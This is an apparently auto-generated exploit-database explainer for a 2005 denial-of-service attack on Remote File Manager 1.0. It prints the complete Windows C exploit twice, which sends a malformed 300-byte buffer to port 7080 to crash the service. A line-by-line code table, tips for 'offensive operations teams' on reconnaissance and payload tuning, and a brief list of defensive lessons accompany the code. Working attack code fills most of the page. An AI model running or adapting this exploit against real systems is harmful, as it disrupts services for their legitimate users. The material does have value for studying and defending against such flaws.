By exploitdb papers bot•May 8, 2005•
papers
Remote File Manager 1.0 Denial of Service Exploit Explained
Remote File Manager 1.0 Denial of Service Exploit Explained
What this paper is
This paper describes a Denial of Service (DoS) exploit targeting Remote File Manager version 1.0. The exploit works by sending a malformed request to the vulnerable service, causing it to crash or become unresponsive, thus denying service to legitimate users.
Simple technical breakdown
The exploit targets a vulnerability in how Remote File Manager 1.0 handles specific network requests. By sending a crafted string that is too long or malformed, the program's memory can become corrupted, leading to a crash. The exploit uses a C program that connects to the target server on port 7080 and sends this crafted string.
Complete code and payload walkthrough
The provided C code is a simple network client designed to exploit a vulnerability in the Remote File Manager 1.0 service.
/*
Server Remote File Manager DoS Exploit
-------------------------------------------
INFGP - Hacking&security Research
[+] Attacking localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost : Disconected!
Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300
int main (int argc, char *argv[]){
char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";
unsigned int rc,addr,inetsock ;
struct sockaddr_in tcp;
struct hostent * hp;
WSADATA wsaData;
char buffer[size];
memset(buffer,'A',300);
memcpy(buffer,req,25);
if(argc < 2) {
printf("\n\n Server Remote File Manager DoS Exploit \n", argv[0]);
printf(" -----------------------------------------\n", argv[0]);
printf(" INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target]\n", argv[0]);
printf("[?]Exam: %s localhost \n", argv[0]);
exit(-1) ;
}
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!inetsock){
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
tcp.sin_port=htons(7080);
printf("\n[+] Attacking %s..\n" , argv[1]) ;
printf("[+] Build DOS string\n");
Sleep(1000);
printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] Sending bad format..\n") ;
send(inetsock , buffer , sizeof(buffer) , 0);
printf("[+] %s : Disconected! \n\n" , argv[1]) ;
}
else {
printf("[-] Port :7080 is invalid.Server not connected!\n");
}
}
// milw0rm.com [2005-05-08]| Code Fragment/Block | Practical Purpose |
|---|---|
/* ... */ (Header Comments) |
Provides introductory information about the exploit, its authors, and its purpose. |
#include <stdio.h> |
Standard input/output functions (e.g., printf). |
#include <stdlib.h> |
Standard library functions (e.g., exit). |
#include <string.h> |
String manipulation functions (e.g., memset, memcpy). |
#include <winsock2.h> |
Windows Sockets API for network programming. |
#pragma comment(lib, "ws2_32.lib") |
Links the Winsock 2.0 library. |
#define size 300 |
Defines a constant size for buffer allocation. |
int main (int argc, char *argv[]) |
The main function where program execution begins. argc is the argument count, and argv is an array of argument strings. |
char req[] = "..." |
Defines a character array req containing the malformed request string. This is the core of the exploit payload. |
unsigned int rc,addr,inetsock; |
Declares unsigned integer variables for return codes, IP addresses, and socket descriptors. |
struct sockaddr_in tcp; |
Declares a sockaddr_in structure to hold TCP socket address information (IP address, port, family). |
struct hostent * hp; |
Declares a pointer to a hostent structure, used to resolve hostnames to IP addresses. |
WSADATA wsaData; |
Declares a WSADATA structure to store Windows Sockets initialization data. |
char buffer[size]; |
Declares a character array buffer of size 300 bytes, which will hold the data to be sent. |
memset(buffer,'A',300); |
Initializes the buffer with 300 'A' characters. This is a common technique to create a large, predictable block of data. |
memcpy(buffer,req,25); |
Copies the first 25 bytes of the req string into the buffer. This means the buffer will start with the req string and be padded with 'A's afterwards. |
if(argc < 2) { ... } |
Checks if the program was called with at least one command-line argument (the target hostname or IP address). If not, it prints usage instructions and exits. |
WSAStartup(MAKEWORD(2,1),&wsaData) |
Initializes the Winsock DLL. MAKEWORD(2,1) specifies Winsock version 2.1. |
hp = gethostbyname(argv[1]); |
Attempts to resolve the target hostname provided as the first command-line argument (argv[1]) into an IP address. |
if (!hp){ addr = inet_addr(argv[1]); } |
If gethostbyname fails (meaning it's not a valid hostname), it tries to interpret argv[1] as an IP address using inet_addr. |
if ((!hp) && (addr == INADDR_NONE)) { ... } |
Checks if both hostname resolution and IP address parsing failed. If so, it prints an error and exits. INADDR_NONE is a special value indicating an invalid IP address. |
inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); |
Creates a TCP socket. AF_INET specifies the IPv4 address family, SOCK_STREAM specifies a stream socket (TCP), and IPPROTO_TCP specifies the TCP protocol. |
if (!inetsock){ ... } |
Checks if socket creation failed. |
if (hp != NULL) memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); else tcp.sin_addr.s_addr = addr; |
Populates the tcp.sin_addr field with the target's IP address, either from the resolved hostname (hp->h_addr) or the parsed IP address (addr). |
if (hp) tcp.sin_family = hp->h_addrtype; else tcp.sin_family = AF_INET; |
Sets the address family for the socket structure. It's usually AF_INET for IPv4. |
tcp.sin_port=htons(7080); |
Sets the target port to 7080 (network byte order using htons). This is the default port for the Remote File Manager service. |
printf("\n[+] Attacking %s..\n" , argv[1]) ; |
Informs the user which target is being attacked. |
printf("[+] Build DOS string\n"); |
Indicates the exploit string is being prepared. |
Sleep(1000); |
Pauses execution for 1 second. |
printf("[+] Buffer size = %d byte\n" , sizeof(buffer)); |
Displays the size of the buffer being used. |
rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); |
Attempts to establish a TCP connection to the target IP address and port. |
if(rc==0) { ... } |
If the connection is successful (rc is 0): |
Sleep(1000); |
Pauses for 1 second. |
printf("[+] Sending bad format..\n") ; |
Informs the user that the exploit data is being sent. |
send(inetsock , buffer , sizeof(buffer) , 0); |
Sends the entire buffer (which starts with the req string and is padded with 'A's) to the connected socket. This is the DoS payload delivery. |
printf("[+] %s : Disconected! \n\n" , argv[1]) ; |
Indicates that the connection was closed by the server, which is expected if the DoS was successful. |
else { ... } |
If the connection failed (rc is not 0): |
printf("[-] Port :7080 is invalid.Server not connected!\n"); |
Informs the user that the target port is not open or the server is not reachable. |
Shellcode/Payload Segments:
The "payload" in this exploit is not traditional shellcode that executes commands. Instead, it's the crafted data sent over the network.
reqstring:M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-qv#trog.ro#mkodph>qv#trog.ro#mkodph\n- Purpose: This string is designed to be malformed or excessively long in a way that the Remote File Manager 1.0 service cannot handle. The exact characters and structure are likely chosen to trigger a buffer overflow, an unhandled exception, or a resource exhaustion condition within the server's parsing logic. The repetition of similar patterns suggests an attempt to fill a buffer or trigger a specific processing path repeatedly. The final
qv#trog.ro#mkodph>qv#trog.ro#mkodph\npart might be a specific command or data that, when combined with the preceding data, causes the crash.
- Purpose: This string is designed to be malformed or excessively long in a way that the Remote File Manager 1.0 service cannot handle. The exact characters and structure are likely chosen to trigger a buffer overflow, an unhandled exception, or a resource exhaustion condition within the server's parsing logic. The repetition of similar patterns suggests an attempt to fill a buffer or trigger a specific processing path repeatedly. The final
buffer:- Initialization:
memset(buffer,'A',300);fills the entire 300-byte buffer with 'A' characters. - Payload Insertion:
memcpy(buffer,req,25);overwrites the first 25 bytes of the 'A's with the beginning of thereqstring. - Sent Data: The
send()function transmits the entirebuffer(300 bytes) to the target. This means the data sent is:M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-followed by 275 'A' characters. The originalreqstring is longer than 25 characters, but only the first 25 are copied into the buffer before it's padded. This implies the vulnerability might be triggered by the initial characters ofreqcombined with a large amount of subsequent data, or the vulnerability is triggered by the specific characters within the first 25 bytes ofreqand the subsequent padding. The\nat the end ofreqis not copied into the buffer becausememcpycopies only 25 bytes.
- Initialization:
Execution Flow:
- Initialization: Winsock is initialized.
- Argument Check: Verifies if a target is provided.
- Target Resolution: Resolves the target hostname/IP.
- Socket Creation: Creates a TCP socket.
- Connection: Attempts to connect to the target on port 7080.
- Payload Preparation: A 300-byte buffer is created, filled with 'A's, and then the first 25 bytes of the
reqstring are copied into it. - Data Transmission: The 300-byte buffer is sent to the connected socket.
- Result: If the connection closes, it's assumed the DoS was successful.
Practical details for offensive operations teams
- Required Access Level: Network access to the target system's port 7080. No prior authentication or user privileges are required as this is a network-level DoS.
- Lab Preconditions:
- A target system running Remote File Manager 1.0.
- The target system must be accessible over the network on port 7080.
- A controlled network environment to test the exploit without impacting production systems.
- A Windows machine to compile and run the exploit code (due to
winsock2.handWSAStartup).
- Tooling Assumptions:
- A C compiler (like MinGW or Microsoft Visual C++) to compile the
.cfile into an executable. - A network scanner (e.g., Nmap) to identify open port 7080 on potential targets.
- A debugger or packet capture tool (e.g., Wireshark) to analyze network traffic and server behavior if needed for further investigation or adaptation.
- A C compiler (like MinGW or Microsoft Visual C++) to compile the
- Execution Pitfalls:
- Incorrect Target: The exploit will fail if the target is not running Remote File Manager 1.0 or if port 7080 is not open/accessible.
- Firewalls/Network Segmentation: Network firewalls or Intrusion Prevention Systems (IPS) might block the connection or the malformed packet.
- Service Not Vulnerable: The target service might be a different version or have a patch that mitigates this specific DoS vulnerability.
- Payload Truncation: The
memcpy(buffer,req,25);line is critical. If the vulnerability requires more of thereqstring or a different part of it, this specific implementation might not work. The exploit sends only 300 bytes total, starting with the first 25 characters ofreqfollowed by 'A's. The actual vulnerability might be triggered by a longer or different payload. - Windows Specifics: The code relies on Windows Sockets API (
winsock2.h,WSAStartup). It will not compile or run on Linux/macOS without significant modification.
- Tradecraft Considerations:
- Reconnaissance: Confirm the presence of Remote File Manager 1.0 and its version through banner grabbing or vulnerability scanning before attempting exploitation.
- Stealth: A DoS attack is inherently noisy and disruptive. It's crucial to ensure authorization and understand the impact. Avoid running this against systems without explicit permission.
- Payload Customization: If the initial exploit fails, the
reqstring and buffer size might need adjustment based on reverse engineering the target service or analyzing network traffic. The currentreqstring is very long, but only the first 25 characters are copied into the buffer before padding. This suggests the vulnerability might be triggered by the initial characters and a large amount of data, or the specific characters within the first 25 bytes are key.
Where this was used and when
- Context: This exploit was published in 2005. It targets a specific version (1.0) of a software called "Remote File Manager." Such tools were common for managing files on remote servers.
- Timeframe: The exploit was published on May 8, 2005. It would have been relevant around that time and potentially for a period afterward until the vulnerable software was patched or phased out. Exploits from this era often targeted widely used but less securely developed applications.
Defensive lessons for modern teams
- Input Validation is Crucial: Always validate and sanitize all user-supplied input, especially data received over the network. This includes checking lengths, character sets, and expected formats.
- Secure Coding Practices: Developers must be trained in secure coding practices to avoid common vulnerabilities like buffer overflows, which this exploit likely leverages.
- Regular Patching and Updates: Keep all software, including server applications and operating systems, up-to-date with the latest security patches. Vendors often release fixes for known vulnerabilities.
- Network Segmentation and Firewalls: Restrict access to sensitive services by using firewalls and network segmentation. Only allow connections from trusted sources to necessary ports.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect and block known exploit patterns or anomalous network traffic.
- Service Hardening: Disable or remove unnecessary services. If Remote File Manager is not essential, it should be uninstalled. If it is essential, ensure it's configured securely and is the latest patched version.
- Principle of Least Privilege: Ensure services run with the minimum necessary privileges to limit the impact of a successful compromise or DoS.
ASCII visual (if applicable)
This exploit is a client-server interaction. A simple diagram illustrating the connection and data flow can be helpful.
+-----------------+ +-------------------------+
| Attacker Client | ----> | Target Server (RFM 1.0) |
| (Exploit Code) | | (Port 7080) |
+-----------------+ +-------------------------+
| |
| 1. TCP Connection |
| 2. Malformed Request |
| (300 bytes) |
|---------------------->| 3. Service Crashes/Unresponsive
| |
| 4. Connection Closed |
|<----------------------| (or server becomes unresponsive)Explanation:
- The attacker's client program establishes a TCP connection to the target server on port 7080.
- The client sends a specially crafted 300-byte request. This request is designed to exploit a flaw in how the Remote File Manager 1.0 service processes incoming data.
- The vulnerable service on the target server receives the malformed data. This causes an internal error, leading to a crash, an unhandled exception, or the service becoming unresponsive.
- As a result of the crash or unresponsiveness, the server may close the connection, or the client may detect that the server is no longer responding, indicating a successful Denial of Service.
Source references
- Paper ID: 988
- Paper Title: Remote File Manager 1.0 - Denial of Service
- Author: basher13
- Published: 2005-05-08
- Keywords: Windows, dos
- Paper URL: https://www.exploit-db.com/papers/988
- Raw Exploit URL: https://www.exploit-db.com/raw/988
Original Exploit-DB Content (Verbatim)
/*
Server Remote File Manager DoS Exploit
-------------------------------------------
INFGP - Hacking&security Research
[+] Attacking localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost : Disconected!
Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300
int main (int argc, char *argv[]){
char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";
unsigned int rc,addr,inetsock ;
struct sockaddr_in tcp;
struct hostent * hp;
WSADATA wsaData;
char buffer[size];
memset(buffer,'A',300);
memcpy(buffer,req,25);
if(argc < 2) {
printf("\n\n Server Remote File Manager DoS Exploit \n", argv[0]);
printf(" -----------------------------------------\n", argv[0]);
printf(" INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target]\n", argv[0]);
printf("[?]Exam: %s localhost \n", argv[0]);
exit(-1) ;
}
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!inetsock){
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
tcp.sin_port=htons(7080);
printf("\n[+] Attacking %s..\n" , argv[1]) ;
printf("[+] Build DOS string\n");
Sleep(1000);
printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] Sending bad format..\n") ;
send(inetsock , buffer , sizeof(buffer) , 0);
printf("[+] %s : Disconected! \n\n" , argv[1]) ;
}
else {
printf("[-] Port :7080 is invalid.Server not connected!\n");
}
}
// milw0rm.com [2005-05-08]